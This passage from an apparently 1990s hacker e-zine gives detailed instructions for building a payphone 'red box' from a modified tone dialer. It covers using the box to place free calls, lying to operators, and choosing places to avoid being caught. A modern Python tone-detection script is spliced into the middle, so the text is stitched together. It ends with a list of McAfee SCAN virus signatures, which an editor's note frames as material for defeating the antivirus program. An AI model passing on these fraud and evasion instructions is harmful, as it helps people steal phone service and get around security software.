  phone.  You aren't using quarters, the tones are coming from a small     
  black box." I just denied it and she reconnected me, but I kept *that*   
  call short. Sorry Lone Wolf.) I've even once gotten an intelligent local
  operator (gasp!) ("Okay, please insert a quarter now... I'm sorry sir,   
  that did not sound like the quarter tone. Do you want to try inserting a 
  real coin?") You can always hang up and hope you get a less intelligent
  one, but it's a pain in the ass.                                         
                                                                           
* At least in my area, local calls cannot be boxed directly...you have to  
  either go through an operator or use an Equal Access override code (see  
  below). Another hassle.                                                  
                                                                           
* To my knowledge, this only works on the North-American phone system...   
  Tough luck for all you foreigners :-).                                   
                                                                           
* Doesn't work on COCOTs, only pay phones owned by the local telco.        
                                                                           
Notes from Nowhere Man                                                     
~~~~~~~~~~~~~~~~~~~~~~                                                     
All of the above may not apply in your area; it all depends on how your    
local telco runs things. Specifically, in some areas you *may* be able to  
directly box local calls.                                                  
                                                                           
Certain phones don't seem to allow the tones to get through. So far,       
I've only found three such phones, two at one location (a gas station).    
Hopefully this is just a fluke and not some kind of trend...               
                                                                           
Also, don't think that you can get money by using your box and asking      
the operator for your money back.  It won't work.  You see, the actual     
coins that you've deposited are returned to you, and since you've put      
nothing in, you get nothing out.                                           
                                                                           
I'd also like to add that contrary to what it says in some text files,     
it is not necessary to deposit a nickel before making a call.  Supposedly
the phone company performs a "ground test" when you make a call, so
something has to be in the coin chute for the call to go through.  This may
or may not be true, but I've never deposited a coin before boxing a call   
and I've never had any problems directly due to this (I've gotten a few    
suspicious operators, but they've always relented after I "re-deposit" my  
"quarter" which didn't seem to register.  Of course, the international     
operators at AT&T are much better informed...)                             
                                                                           
                                                                           
Building Your Red Box                                                      
~~~~~~~~~~~~~~~~~~~~~                                                      
There are only two real components for a red box, at least using the       
"standard" method. The easiest part to get (but the more expensive one) is 
a Radio Shack "Thirty-Three Number Memory Pocket Tone Dialer," catalog     
number 43-141 (just ask the guy for "a tone dialer that can store          
numbers" to play dumb). At last check these are US$24.95 each (and they're 
kept behind the counter, so thieving is basically out unless you have      
inside connections). Be sure to get the one with memory features; the one  
with no memory is useless. The second thing you'll need is a 6.5536 MHz    
crystal. These can be obtained from your local electronics store (they're  
hard to find though, I know Radio Shack doesn't carry them) or from a mail 
order electronics distributor. (One frequently mentioned is Fry's          
Electronics in San Francisco, which sells these crystals for $0.89/each.   
They can be reached at 415-770-3763. I did not get my crystal from Fry's,  
so I cannot vouch for them.) In most cases the crystals cost between $.25  
and $1.00 each, plus postage, if applicable. Oh yeah, you'll also need     
three AAA batteries. You can just pick these up at the local convenience   
store or buy them at Radio Shack when you buy the tone dialer. (Note:      
There is a rumor that Radio Shack is no longer offering the tone-dialer    
with memory. The stores in my area still have them in stock, but in some   
places they're supposedly unavailable.  Get 'em while you can.)            
                                                                           
The only tools you'll need to make the red box are a small Phillips
screwdriver and a soldering iron (and solder). A pair of tweezers may also 
be useful. You'll want to work in a well-lit place, naturally, with good   
ventilation (solder gives off horrid fumes). First, unscrew the screws on  
the back of the tone dialer's case (there are some in the battery          
compartment, too). Carefully pry open the case; you'll need to apply more  
force than you would think, but be careful not to break it or lose the     
switches, which can fall out when the case is opened. Next, solder out the 
3.579 MHz crystal, which looks like a small silver cylinder toward the     
bottom-right of the board. Remove the crystal and save it. In its place,
solder in your 6.5536 MHz crystal, being careful not to let the two leads  
touch one another, or to drip solder across the two leads. Because the new 
crystal is much larger than the old one, you may have to *CAREFULLY* bend a
few other crystals to make room for it. Put the cover back on, and rescrew 
the case. Finally, pop in the three AAA batteries the dialer requires.     
You're now ready to program your box.                                      
                                                                           
Programming Your Red Box                                                   
~~~~~~~~~~~~~~~~~~~~~~~~                                                   
Ok, you've just replaced the crystal in your pocket dialer.  Now what      
do you do? It's pretty easy. Switch the Store/Dial switch to "Store" and   
turn the unit on. The red LED in the upper-left should go on (if it        
doesn't, you screwed up; open it up and try again). Now press the "Mem"    
button (left-most button on the bottom row) and then hit the star key ("*")
five (5) times. Then press Mem again and press a "Priority" button (one of 
the top three buttons); I like to use P3 for this. The unit should beep,   
letting you know that the number was stored. This button is now the        
"quarter" key. Next, press the Mem button, press P3 (or whatever button    
you used for the quarter key), Pause (the middle button on the bottom row),
P3, etc. (As an alternative to the Pause button, I have been informed that 
you can use the pound key instead, making your dialing much quicker.  I    
wouldn't use this on a live operator, though... After experimenting with   
this method, I've found that it tends to bring a live operator on the line 
very often.) You want to store four "quarters" and five pauses total, a    
pause between each "quarter." Then hit Mem again, then P2 (or whatever key 
you want to use for the $1.00 key), and wait for the beep. Flip your unit  
off, then switch the Store/Dial switch to Dial. Your red box is now ready. 
                                                                           
Why Does This Work?                                                        
~~~~~~~~~~~~~~~~~~~                                                        
You may be asking yourself "how in the world can this work?!" Basically,   
the red box works on the principle that when you put money into a pay phone
tones are generated to indicate to the CO that you've dropped in a coin;   
the red box simulates these tones, allowing you to make calls for free.    
When you replace the factory-installed 3.579 MHz crystal with the 6.5536   
MHz one, you are altering the DTMF tones upward so that the star key now   
happens to be the same pitch as a coin tone (1700 Hz + 2200 Hz). When you  
store the five tones, nothing particular happens; but it so happens that   
Radio Shack pocket dialers replay those stored tones at the precise rate   
that a pay phone expects for a quarter (five thirty-three millisecond beeps
with a thirty-three millisecond pause between each of the bleeps). (It is  
possible to simulate nickel and dime sounds, too, but the timings are
different, and would require much more work for something that's really    
useless. Why use small coins when you can just use quarters?)  Please note 
that because of the tone shift caused by the crystal, the touch-tone keys  
will no longer work right...your box is no longer a pocket dialer. For     
those interested in keeping the dialing feature, try building the COMBO box
(red/white box), as detailed in text files and 2600 Magazine, Autumn 1992  
issue.                                                                     
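
Seen from the detection side, the clock scaling described above puts the shifted star-key tones near the coin frequencies but not on them, and that offset is measurable. The following is an added example, not part of the original article: it computes the scaled pair and classifies a 33 ms burst by how far its peaks sit from nominal. The 8 kHz sample rate, the exact 3.579545 MHz stock crystal value, the standard DTMF star pair (941 Hz + 1209 Hz) and both thresholds are assumptions, not figures from the text.

```python
import cmath
import math

FS = 8000                       # sample rate, Hz (assumed telephone-band audio)
BURST_S = 0.033                 # one 33 ms beep, as given in the article
COIN_PAIR = (1700.0, 2200.0)    # nominal coin tone from the article
DTMF_STAR = (941.0, 1209.0)     # standard DTMF pair for "*" (not in the article)
STOCK_XTAL_MHZ = 3.579545       # assumed exact value; the article rounds to 3.579
SWAP_XTAL_MHZ = 6.5536          # replacement crystal named in the article
TOLERANCE = 0.005               # assumed acceptance window: 0.5% of nominal
MIN_FRACTION = 0.2              # assumed minimum share of burst energy per tone


def shifted_pair():
    """Frequencies the "*" key produces once its clock is scaled by the swap."""
    ratio = SWAP_XTAL_MHZ / STOCK_XTAL_MHZ
    return tuple(f * ratio for f in DTMF_STAR)


def burst(pair, seconds=BURST_S):
    """Constructed test signal: one dual-tone burst with equal amplitudes."""
    count = round(FS * seconds)
    return [0.5 * sum(math.sin(2 * math.pi * f * i / FS) for f in pair)
            for i in range(count)]


def measure(samples, nominal, span=60):
    """Return (peak_hz, energy_fraction) found within nominal +/- span Hz."""
    n = len(samples)
    if n < 2:
        return nominal, 0.0
    # Hann window keeps leakage from the other tone out of the search band.
    window = [0.5 - 0.5 * math.cos(2 * math.pi * i / (n - 1)) for i in range(n)]
    xw = [w * s for w, s in zip(window, samples)]
    energy = sum(v * v for v in xw)
    if energy == 0.0:
        return nominal, 0.0
    gain = sum(window) ** 2 / sum(w * w for w in window)
    best_hz, best_power = nominal, 0.0
    for hz in range(int(nominal) - span, int(nominal) + span + 1):
        step = cmath.exp(-2j * math.pi * hz / FS)
        phasor, acc = 1 + 0j, 0j
        for v in xw:            # single-bin DFT at hz, on a 1 Hz search grid
            acc += v * phasor
            phasor *= step
        power = abs(acc) ** 2
        if power > best_power:
            best_hz, best_power = float(hz), power
    # Normalised so a lone sine scores about 1.0 and each of two equal tones 0.5.
    return best_hz, 2.0 * best_power / (gain * energy)


def classify(samples):
    """Return 'absent', 'nominal' or 'off-nominal' for one burst."""
    worst = 0.0
    for nominal in COIN_PAIR:
        peak_hz, fraction = measure(samples, nominal)
        if fraction < MIN_FRACTION:
            return "absent"
        worst = max(worst, abs(peak_hz - nominal) / nominal)
    return "off-nominal" if worst > TOLERANCE else "nominal"


if __name__ == "__main__":
    for label, pair in (("coin", COIN_PAIR), ("shifted *", shifted_pair()),
                        ("stock *", DTMF_STAR)):
        print(label, [round(f, 1) for f in pair], classify(burst(pair)))
```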
                                                                           
For more information on red box theory, and for plans on how to build      
a "true" red box (this requires much more time, effort, and skill, and     
gives no benefit), check out other files on red boxes (RED.BOX, etc.).     
Also refer to Rock Steady's excellent article on red boxing in this issue. 
                                                                           
Rock Steady takes the "electronics" approach; being a novice at electronics
I elected to take the easy way and just modify the tone dialer.            
(Remembering what it's like to have no idea what the fuck you're doing, I  
wrote this file as explicitly as possible.  Forgive me if it seems *too*   
detailed for you.)                                                         
                                                                           
Placing Calls                                                              
~~~~~~~~~~~~~                                                              
To place a call with a red box, put the speaker on the tone dialer firm    
against the mouthpiece of the pay phone, making sure the black rubber ring 
on the back of the dialer fits snugly against the mouthpiece, turn it on
(you can verify that it's on by the LED in the upper-left), and press the  
priority (P) buttons as needed to generate quarter sounds. Details are     
given for the three types of phone calls: intra-LATA, inter-LATA, and      
international.                                                             
                                                                           
                                                                           
Intra-LATA (local)                                                         
~~~~~~~~~~~~~~~~~~                                                         
If you're in the same boat I am, you may not be able to box local calls.   
If this is the case, just dial the operator and explain to her how you need
to place a call to wherever.  Usually she'll just ask for your quarter, but
sometimes she'll ask why you don't do it yourself; in this case, you can   
either feign ignorance ("Ah, iz zhat so?  I ahm zorry, I ahm visiting from 
Germany unt zhere ve have to make khalz through zee operator.  Can you dial
it for me?") or feed her some story how the phone keeps swallowing your    
quarters or not recognizing them or something. When she asks for the       
quarter (or possibly more), give it to her...just press the "quarter" key  
however many times is needed, leaving a slight pause between each one to   
avoid suspicion (after all, no human can drop in a quarter per second).    
"Thank you, please hold.  CLICK.  RING..."                                 
                                                                           
The better, faster alternative is to go through AT&T using an Equal Access
override code.  Simply dial 10288+1-NPA-NXX-XXXX (basically, you're using  
AT&T to place a call which would normally be placed via your local phone   
company).  Treat this just like an inter-LATA call (see below). Note that  
this will only work with AT&T (10288), as only AT&T is equipped to place
long-distance calls from a pay phone.  (As a side note, AT&T charges you   
about $2.10 or so for a call which would normally cost only $0.25.  Kinda' 
funny...  Of course, with a red box, this doesn't matter.) Unfortunately,  
some pay phones block Equal Access codes; if this is the case, just go     
through the local operator (after all, the local telco has exclusive rights
to intra-LATA calls).                                                      
                                                                           
If you can box local calls, just deposit the virtual quarters after        
you dial the number, just like an inter-LATA call (see below).             
                                                                           
                                                                           
Inter-LATA (long-distance)                                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~                                                 
Dial up the number, then wait for the ACTS voice or AT&T operator. "Please 
deposit two dollars and fifty-five cents for the first three minutes." Do  
as it says...hit the "one-dollar" key twice and then the "quarter" key     
three times (or whatever combination is required for your call). (When you 
get really fast, you'll find it faster to just use the "quarter" key       
exclusively.) "Thank you for using AT&T. You have twenty cents credit      
toward overtime..." That's all there is to it. If you do get an operator,  
keep cool, just keep putting in money but use the "quarter" key only, as   
some operators will get suspicious when you drop in $1.00 in quarters at   
perfectly regular intervals.  They almost always leave you alone.          
                                                                           
Every so-many minutes (usually three or five) a computer voice or a live   
operator will ask for more money.  Give it to her as outlined above.       
                                                                           
Sometimes after you hang up an operator will call the phone back           
immediately, demanding some money for overtime. You can either give it to  
her (with your box, of course), or "give it to her."  It's fun to chew out 
the Bell bitch when she can't do a thing about it...they just have to write
off the loss. (They threaten to bill the called party sometimes, but they  
can't legally do this; it's just an intimidation tactic.)                  
                                                                           
                                                                           
International                                                              
~~~~~~~~~~~~~                                                              
Dial 011, then the country code, then the area code, and finally the       
local number; press the pound key ("#") to signal the end of the number.   
Wait for the AT&T operator to come on (notice that all long-distance and   
international calls that are paid for with coins [as opposed to calling    
cards] are only handled by AT&T...really fair). Ask her to put your call   
through (she may verify the number), and yes, you are paying with coins.   
She'll say something like "Ok, your call will cost $6.50 [this is for      
Melbourne, Australia], but I can only take $3.00 at a time. Please insert  
the first three dollars now..." Be sure to use only the "quarter" key with 
live operators, as many international operators have recently been alerted 
to red boxing.  They are catching on, so be careful not to arouse their    
suspicion. When you "pay" three dollars (heheh) she'll say something like, 
"Ok, please wait," then you'll hear the connection going through and       
the "foreign" ringing. When someone answers she'll say something like      
"This is United States calling, please hold for an international call."    
If no one's home, you'll get your money back. Too bad none comes out...    
The person is then muted out, then she asks for the rest of the money.     
Give it to her. "Thank you, go ahead..." Every so-many minutes (usually    
one or two) a live operator will ask for more money. Give it to her as     
outlined above. (Note: regardless of what they may say, the operator tends 
to hang out on the line and listen in on you.  Do not tell the person how  
you're calling, as I'm sure that's how they once caught on. I'd also       
suggest keeping the conversation legal.)                                   
                                                                           
Sometimes after you hang up an operator will call the phone back           
immediately, demanding some money, just as with a long-distance call.      
See above for more details.                                                
                                                                           
                                                                           
Where Should I Call From?                                                  
~~~~~~~~~~~~~~~~~~~~~~~~~                                                  
To be brief, you can use your red box from any true pay phone (red         
boxes do not work on COCOTs [privately-owned pay phones]). Notice I say    
"can" and not "should;" some phones are definitely better than others.     
I've found that the best places to make calls from are government-owned    
buildings. Why? These are public places, there are always real pay phones  
there, and they are indoors, where it's warm in the winter and cool in the 
summer. The best phones are isolated and have a place for you to sit while 
you talk. I suggest you box from libraries, schools, municipal buildings,  
etc., but in my opinion, high schools are best. Why? They're open late     
for sports, etc. most days, even weekends, and you can blend in very easily
(if you're a teenager, you're a student; if you're older, you're an older
brother visiting your old school; if you look old enough, you're a parent).
Just go after school hours or it'll be noisy... Everyone has a favorite    
place, just look around and find yours.                                    
                                                                           
                                                                           
Will I Be Caught?                                                          
~~~~~~~~~~~~~~~~~                                                          
The following is an approximation of chances of being caught while using   
a red box (and dealing with a live operator). You can assume that you      
will never be caught when dealing with an electronic "operator" (ACTS).    
Again, these are only approximations based on my experience. Remember,
though, even if you are caught, nothing will happen to you; just hang up   
and try again.  If they threaten to call the police or anything, just take 
off, don't take any chances.                                               
                                                                           
Range           % Detected                                                 
~~~~~           ~~~~~~~~~~                                                 
Local           5% or less                                                 
Long-distance   25% or less                                                
International   75% or less                                                
                                                                           
                                                                           
Closing                                                                    
~~~~~~~                                                                    
I've found red boxing to be a great form of phreaking. There's no risk     
of being caught and you can call anywhere in the world for free -- all it  
takes is a $30 investment and the willingness to put up with the hassles.  
Plus, you get the added bonus of being able to laugh to yourself next time 
you see some chump actually putting real money in a pay phone (gasp!).     
                                                                           
Time to give credit where credit is due: I'd like to thank The Baron       
and Guido Sanchez for introducing me to red boxing, and GarbageHeap for    
telling me some of the tricks of the trade (come back to Chicago soon!).   
Also, some of the information in the Autumn 1992 issue of 2600 magazine and
in various text files (e.g. RED.BOX, etc.) has proved useful to me, and was
referenced in this article.  To everyone, your help is much appreciated.   
                                                                           
Well folks, get going, and have fun with your new toy!                     
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
SCAN v100 Virus Signatures
~~~~~~~~~~~~~~~~~~~~~~~~~~                                                 
                                                                           
The following is a list of all scan strings extracted from McAfee's Scan
v100. Note: No self-mutating virus signatures can be automatically
extracted from SCAN due to problems with wildcard searches. If you need the
signature for a mutating virus not found on the list, please contact:
        Screaming Radish@111:950/75 via 111:950/3.
                                                                           
[Note from Rock Steady: We have also included a file called MCAFEE.STR,
the product of Screaming Radish from Australia, that removes Scan
strings from any version of the AV program SCAN by McAfee. We have a
similar method for F-Prot, and F-Prot's VIRSTOP, which will be included in
the next InfoJournal. Check it out -- are you surprised how dumb this
program is? Remember the first MtE scare? SCAN used *VIRUS STRINGS* on it!
HAHAHA...dummies! And they claimed a 99.9999% hit rate...bite me.]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                           
                                                                           
[Curse]    Curse           fbb8c0078ed81eb8520050cbb840008ec0              
[Filler]   Filler          f7e32d00108ec0                                  
[MBug]     Music Bug       8cc88ed88ec08ed0bc00f0                          
[Iboot]    Israeli Boot    cd13b80202b90627ba0001                          
[Ghost]    Ghost           90ea59ec00f09090                                
[Mich]     Michaelangelo   a14e00a30c7ca113044848a3                        
[Stoned]   Stoned          ab004848a31304b106d3e0                          
[Emp]      Empire          ea9f01c007                                      
[Mardi]    Mardi Bros.     d88ed0bc00f0fbe827                              
[EDV]      EDV             751c80fe0175175b071f5883                        
[Alameda]  Yale/Alameda    b400cd13720db801                                
[Loa]      Loa Duong       fb8ed8fe0e1304a11304                            
[Teq]      Tequila         8ed3bc007cfb33ff832e13                          
[Micro]    Microbes        8ed0bc00f0fba113042d04                          
[A-Vir]    Anti-Tel        fb8ed8a1130448a3                                
[P-2]      Print Screen-2  7401bf0300b92000f3a4                            
[PrtScr]   Print Screen    cd05fec8a26001c36f6e2d                          
[Korea]    Korea           8ed0bcf0fffbbb1304                              
[Killer]   Disk Killer     c310e2f2c606f301ff90eb55                        
[Brain]    Pakistani Brain c30002e2f4a113042d07                            
[Form]     Form            e8b2005a5e1f33c050b8007c                        
[Ping]     Ping Pong - B   a1f581a3f57d8b36f981                            
[Tboot]    Typo Boot       241355aa                                        
[Flip]     Flip            fbb80300e81f0006b8                              
[Joshi]    Joshi           f3a48cc00520008ec0bb                            
[1253]     1253            e4cd1333db2e8a36207d2e8a                        
[Atx]      Anthrax         75ed061e071f32f6b9020033                        
[Invader]  Invader         8ed8a11304b106d3e08ed8                          
[Queen]    Queen's         8ed88ed0bc007c50fb33                            
[Invader]  Invader         b3ffb84342cd213d78567513072e                    
[Genb]     Generic Boot    fab8c0078ed8bf00                                
[OW]       Leper           baab03b43bcd21463b360d03                        
[OW]       V1-Not          b9ff00ba0000cd26b400cd16b80300cd10              
[OW]       8000            7504b000eb02b001a2a43c                          
[OW]       Lug             e8d90159b88c0650e8d10159b8c306                  
[OW]       Wake            bb3f01908a27903226080190                        
[OW]       Explode         8132f6ebd8b041e674ba40008edabb72                
[OW]       Dust            ba9e00cd21b440b93200ba0001                      
[OW]       Veng-B          8b1efc01b9fc008b16020283c262                    
[OW]       Veng-C          8b1e8602cd217246909090890e8802                  
[OW]       Veng-D          8b1eb302cd217246909090890eb502                  
[OW]       Veng-E          8b1e2703cd217303e9dd00890e2903                  
[OW]       Veng-F          8b1e390333c933d2cd211eb43f                      
[OW]       Scribble        ba6c03b43fcd21e82900                            
[OW]       Banana          b98b0090cd215a59b80157cd21b43ecd2159ba9e00      
[OW]       Leper           baab03b43bcd21463b360d03                        
[OW]       102             ba6001b92600cd21721eb441ba5301                  
[OW]       Blaze           b91c01cd21b43ecd21b44fba0001cd21                
[OW]       4915            bf3e040e5731c0509af90867                        
[OW]       Silver3b        f6b8030550e8eb0159e8a7000bc0740a                
[OW]       Secrets         3e01a006010ac0740b300743                        
[OW]       Seneca          81f9bc077e1beb0190b42a                          
[OW]       V1_1            891e70008c067200ba7400b41a                      
[OW]       V2_0            891e82008c068400ba8600b41a                      
[OW]       V1_0            891e5b008c065d00ba6500b41a                      
[OW]       Aids92          48002648616802212020                            
[BFD]      BFD             bb9201eb2133c0be007cfa                          
[Pnz]      Penza           b9bc02f3a4061fb82135cd                          
[Mgm]      Magnum          b9be092e00042ef6ad                              
[Plu]      Plutto          8b36010181ee00022e89360001                      
[Prm]      Prime           2b01b94402512ea00701                            
[Sui]      Suicide         81ed0701e80200eb41b9e803                        
[Ata]      Atas            b92b00b2aa8dbe6200fec23015                      
[Squ]      Squisher        ee11b844008ec0268a1db95401                      
[007]      007             2135a804020056051902280206                      
[132]      132             80f44b7549b8023dcd                              
[658]      Something       eb0e536f6d65746869                              
[Hck2]     Hacktic2        80c6108ec25256b426                              
[V9]       Virus9          890e6d01891671015b                              
[5856]     Bow             bec20903f3b94f002e                              
[vvf]      VVF-34          8b1e03004081ebda0089                            
[1280]     1280            ba0005cd21e8d500bf5004                          
[2136]     2136            81c45809fb3b26060073                            
[VDV]      VDV-853         8aa44f048dbc2001b92f0389                        
[Lam]      Lamer           87060e0050cc589d5826                            
[Alb]      Albanian        e80000bb4c03538bfc33f6                          
[SilW]     Silly Willy     be15008b1ab9d00881e973                          
[Con]      VCL             e800005d81ed06018db61403bf000157a5a4            
[Con]      VCL             e800005f83ef038d750de8                          
[Con]      VCL             e800005d81ed0601e8                              
[Dst3]     Dest3           8b2e010181ed1fffe8e7ffbc4e02                    
[DTR]      DTR             892624018cc88ed0bcf701                          
[Sk]       Sk              ee09b800008ed8893612030e1f                      
[Sk1]      Sk1             ee090e1f0e0789366f04fcbf                        
[500]      500             21813e7c021e03754db452cd21                      
[Ash]      Ash             81ed0b013ec6864702008db604                      
[C16]      Com16850        892e333cc7061d3cffffe81301                      
[Hpp]      Happy           8dbc190181c61201b9070090fc                      
[Lix]      LixoNuke        015e568bfe33c08ed8c41e4c                        
[1182]     Hellween 1182   014434803c00750c8b4401a3                        
[Tr2]      Troi Two        a384008c1e8600fbebb99c80fc                      
[Mch]      Mocha           bf0a01be96011e0e1fe8                            
[CV4]      CV4             8d77cabf0001b90500fcf3a4                        
[GK]       Geek            891ebb038c06bd03baa4                            
[557]      557             b8cdabcd213defcd7405e8                          
[Pia]      Piazzola        be6a04bf0001b4ddb900ff                          
[Rttl]     Rattle          81ed03018d9e20018d968b013e8a8e0301              
[Mex]      Mexican         8a8e03013bda7405300f43                          
[Egn]      Evil Genius     b8cd7bcd2181fbcd7b747f33db0e1f                  
[Slv]      Slovak          80bcfefc007406b8cb11                            
[Slv]      Slovak          268a1d32d82e881d041147e2f3c3                    
[Req]      REQ             01ba2a0003d78bdab41acd                          
[ZY]       ZY              8b0ecb0281c100012e890ecd02                      
[Why]      Why_win         bb01018a27bb02018a07                            
[fizzle]   DataFire        fdb419cd2188466de8e2fe                          
[Davis]    Davis           b9a706fcacc0c8042e3206a706                      
[Cha]      Chang           c3fa0e1f33c08ec0bf0c00a1                        
[VA]       VA              b963068cc88ed8bf0000b8609f                      
[Gre]      Green           8986160433ffc7454a0000                          
[1030]     1030            8ec033db26891fb880                              
[Chs]      Chaser          8a160900bb38008a0732c2                          
[RMIT]     RMIT            f6e88b000bc0740ae851                            
[1661]     1661            fa8bece800005e81ee9a012ef684                    
[Ptch]     Pitch           ba220083c202061fb84725                          
[Mls]      Malaise         81eb970483eb038cc82e                            
[Blus]     Bloodlust       be5d018bfeb92e01b37f                            
[Trk]      Turkey          81eb29012ef687220101740f                        
[417]      OMT             b9890180352a47e2fa                              
[Topo]     Topo            fa0633c08ec0b82b002687060c00508cc8              
[Ant]      ANT             8a260701eb1290ac32c4aae2fa                      
[702]      702             5e3dc707751133c08bd88bcb                        
[205]      205             81eec900b44ebabf00                              
[1835]     1835            be9c0781ee030101de8904be9e07                    
[Krv]      Krivmous        c43e07010657c43e0b010657ff                      
[Lan]      Lanc5476        8000179e83da00739581eb8b                        
[Lan]      Lanc5882        80118b1e3a04c82ef726e904                        
[Lan]      Lanc            9a0e02f000b8f401509a9e025e                      
[PA]       PA-5792         3ec300417407803ec30042754a                      
[Cas]      Casc1621        81eb070183bf010100740e8db7                      
[Sti2]     Stink2          890e7801c6062d0101e8ab00                        
[Timid]    Timid305        ba48ffc70655ff2400b409cd                        
[Tmd]      Timid           e80000832efcff09ba2a                            
[Eno]      Enola           81fb91197503e91101b452                          
[Crk]      Cracky          83ee0956fcbf0001b90500                          
[Mum]      Mummy           04062e8c0665002e8c                              
[Che]      Cheeba          8035264781ff6807                                
[Nina]     Nina            b90001f3a42d100050b8370150cb                    
[Dot]      Dot Killer      feb9400057f3a458ffe0be0001                      
[Sta]      Stahl Platte    b90001f3a48ec01ee9b101                          
[Er]       Error           80fcdd7426b82135                                
[Sat14]    Saturday        3e720201740c0106900083                          
[E92]      Europe 92       83c62dbf000157a5a5c3                            
[Hre]      Here            1eb8f000508becff5e0058                          
[Sdot]     Star Dot        b44fcd2173e5ff0641038cc8                        
[789]      Dot-789         8ec0268b1e6c04891e6604                          
[Tum2]     Tumen V2.0      e813feb4ffcd213d000074                          
[Key]      Keypress        fa2b06920383da00a39803a3                        
[T12]      Thursday 12th   8a26290132260001be0301                          
[1992]     1992            d8b9a006bf03002ea0                              
[1992B]    1992B           2e8c0601008cc88ed8bf0300                        
[Mule]     Mule            2e8a262f0e3e302743e2fa                          
[T3]       Taiwan3         b8404bcd213d78567512                            
[T4]       Taiwan4         b8504bcd213d34127510                            
[Fu]       Fu Manchu       b4e1cd2180fce1731680                            
[DAME]     DAME            be762d81f699548bdebec690                        
[DAME]     DAME            bbbaf4be84a78acb80e11f                          
[DAME]     DAME            b82846bab38df7ea2d3e21                          
[DAME]     DAME            bebaf4bb72c52b9c4810b106                        
[CMDR]     Commander       33e4fbe87400                                    
[Bmb]      Bomber          bb4d0830071e2bf68ede                            
[Boo]      Boojum          d8bb1700291e030029                              
[928]      928             bf000157be2b03b90300                            
[Mog]      Mog             bf0001fcffe7b40e                                
[880]      880             bb36008a0732c288                                
[Hrs]      Horse           cd200a0d4f4b                                    
[334]      334             81ee0b01e80900e8                                
[Shld]     Shield          8d0e2f0e2bcafcac                                
[2623]     2623            b8ab9ccd2f3d76                                  
[LK]       LK              bf000189fe83eef0ff                              
[Em]       Emmie           21c646950081f9bc                                
[Bt]       Beast           8bf283c619bf0001b90300                          
[Qk]       Quake           81fbba00744c891e                                
[981]      981             213d51907455be02                                
[1339]     Mummy           01065c04b84242cd                                
[Ill]      Ill             ea2033ff3e8a86                                  
[ZMT]      ZMT             01b9fc00f3a4b8000159                            
[MPC]      MPC             a503b9140033f633c0                              
[Gls]      Gliss           83bcdf04017402cd20                              
[Anto]     Anto            d87234b43fba7ffdcd                              
[Kzm]      Kuzmitch        b915038a5466309051                              
[Pch]      Peach           53e8800050f3a6741e                              
[Imp]      Imp             213d71197503e9bb00                              
[Sqk]      Squawk          81bc30034d5a742e                                
[Troi]     Troi            b4fccd213ca57428                                
[Shd]      Shield          b9afb560b5b3a5                                  
[Mnc]      Munich          8d2614078cd903                                  
[Emf]      EMF             83ea03b99301cd21                                
[Bst]      Busted          0732060601880743                                
[Mut]      Mutating        e82b004665617220                                
[Mut]      Mutating        04d3ea83ea108cd903caba6d                        
[RusD]     Russian         04d3ea83ea108cd903caba56                        
[914]      V914            04bbde03b97f0058                                
[Bwr]      Beware          8102578bd6fcb903                                
[1308]     1308            9047e2f8a97e39c3                                
[Sadt]     Sadist          89261c008cc8fa8e                                
[DMB]      DM-B            bf00018bc7                                      
[Crp]      Creeper         b8ff43cd218cd82d11                              
[1376]     Hellween        81ee58015650060e                                
[Bob]      Bob             81f9c907720680                                  
[HS]       HS              b8874bcd213d636675                              
[MFC]      Mface           3c75062ec6878a01                                
[DOD]      DoDo            80fcab7502eb31b8                                
[DD]       Dada            0e27062e891e2906                                
[Sr]       Scream          d8ff0e1304c51e8400                              
[Mlg]      Malaga          01a2ca07a2db07a2                                
[K]        Micropox        1ffd720db8f3c1cd                                
[JD]       JD              a45f57b82135cd2181                              
[CKs]      CKsum           129c9d03079c4343e2                              
[109]      109             a4ba00feb41acd21ba67                            
[P45]      P-45            b44eba270131c9cd2172                            
[Qt]       Quiet           8cc801060c01ff1e0a                              
[Sh]       Sh              1e650353e819005bb9                              
[Bry]      Brainy          e800005e56fa83c61b90                            
[CV]       C               4d414effffba                                    
[Crm]      Criminal        fc11742680fc12742180                            
[Hng]      Hungarian       c30eb000fad50a8807                              
[A16]      August16        ba790203d7b41acd                                
[D-T]      D-Tiny          07aba5b82125cd2107                              
[Def]      Define          013dba9e00cd2193                                
[Mar]      Marauder        5e81ee0e01e80500                                
[487]      487             f3bf0e0c0e579a16                                
[Psc]      Psycho          ba1603cd21726fb8                                
[Mn]       Mannequin       813e670456441f75                                
[Dmo]      Demolition      8d77178a04d0e0                                  
[HW]       Halloween       b8b8009a44025701                                
[1244]     1244            b4e0fccd2180fc0375                              
[730]      Ontario         b86e4bcd213d545675                              
[Sov]      Sov             5b0eb90001511e06b1                              
[1186]     Lib1172         5351bb12018b0f1e5b03                            
[Rag]      Rage            ea83c5419055eb0d50                              
[El]       Eliza           43b42acd2180fa0d75                              
[Bet]      Beta            8bfeac32c4aae2fa                                
[472]      ASP-472         d8bb980001d38b0f                                
[Plov]     Plov            12b42ccd2180fa327c                              
[QML]      QMU             ed78060e1f0e07bf                                
[M11]      MPS1.1          8b84d301408984d3                                
[D10]      Day10           f347ba5448263915                                
[Tn]       Tony            b8b70050cb546f6e79                              
[JK]       Joke            894e4972eab801438d                              
[SX]       SX              e70108fe0ee701be                                
[Bro]      Brothers        fc1e7c0fb413cd2f                                
[Sti]      Stink           1f890f894f026107                                
[KU]       KU-448          e7fe0fbe2c0190b9                                
[HrB]      Hero-394        2e8384670310061e                                
[Hary]     Hary            bb3e0281eb2a018b                                
[Sqe]      Squeaker        fbe9b3feb000b4                                  
[MPS]      MPS 3.1         80f4a78865289047                                
[370]      370-B           213d55557503eb5b                                
[V-5]      V-5             1620022e891600018a                              
[802]      PC Flu          e81f001febfefa                                  
[M-123]    Multi           8b44f4a300018a44                                
[Gr]       Grapje          f8b44732d28d36d901                              
[SCT]      SCT             b40eb202cd218cc8                                
[Barc]     Barcelona       b44a0e07cd21fcb80000                            
[LCV]      LCV             a4c31e071e8e1e260133                            
[1452]     1452            52e80602722ee891                                
[621]      621             81f9d0077503e9d2                                
[CRF]      CRF             81ed0b01c6863d02                                
[RST]      Reset           1fe800005d8daeaf                                
[Ph]       PathHunt        81ed1405c3bb0501e8                              
[1701]     1701            81eb3101f6872a01                                
[408]      408             2e03015b53c33d4b                                
[Set]      Semtex          8bf581c681028bfbb907                            
